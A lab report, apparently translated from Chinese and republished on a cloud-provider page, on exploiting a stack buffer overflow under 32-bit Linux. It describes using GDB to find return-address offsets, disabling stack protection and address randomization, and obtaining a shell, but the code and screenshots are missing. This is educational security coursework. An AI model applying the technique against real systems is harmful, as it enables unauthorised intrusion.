Home > Developer > Linux

Buffer overflow attack and Shellcode under Linux

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

4.3.2 The return address of a function in the Linux32 environment

Compile, link, execute the program buffer_overflow.c, and turn off the Linux stack protection mechanism, see:


Debug the program with GDB below:

Set breakpoints at the entrance to the Foo function, at the call to the strcpy function, and at Foo return:

To continue running, locate the return address of the function:

Start address B of the buff to the offset between the return address a of the Save function:

A-b=0xbffff29c-0xbffff280=0x1c=16+12=28

Therefore, if the length of the Lbuffer exceeds 28 bytes, a buffer overflow will occur, and a 4-byte "ABCD" of 28 in Lbuffer will overwrite the value of the address as 0xbffff29c memory unit, that is, the return address of Foo becomes "ABCD" (0x44434241).


Because the 0x44434241 is inaccessible, a break error occurs.

Shellcode writing under the 4.3.3 Linux32 environment

Compile, link, execute shell_asm_fix_opcode.c, you can get the shell through a buffer overflow, see:


4.4 Doing experiments and writing experimental reports

Before the file is modified:

To find out why the overflow occurred, debug with GDB:

Because Lvictim did not overflow, so for debugging convenience, I put the teacher's source code buffer[512] changed to buffer[500],


Recompile run, a segment error occurred:


The following begins with GDB debugging to find out the memory unit where the return address of the SMASH_LARGEBUF function is located and the distance from the buffer start address.

First decompile the SMASH_LARGEBUF function:



Then set three breakpoints:


The following starts the process and gets the return address of the function 0xbffff35c:


Continue to the next breakpoint, the start address of the buff is in 0xbffff158, stored in the 0XBFFFED30:


So:

0xbffff35c-0xbffff158=0x204=516

off_set=516

Buffer_address has a range that can be set starting from 0xbffff158

The following changes are required in the program:


Below begins the demo attack Lvictim, and gets the shell, to be aware of closing the address randomization:


As you can see, the shell has been obtained and the experiment has succeeded.

Finish

Buffer overflow attack and Shellcode under Linux

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
buffer overflow detected linux buffer overflow detected c php buffer overflow buffer overflow detected buffer overflow causes buffer overflow history error logging buffer overflow

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More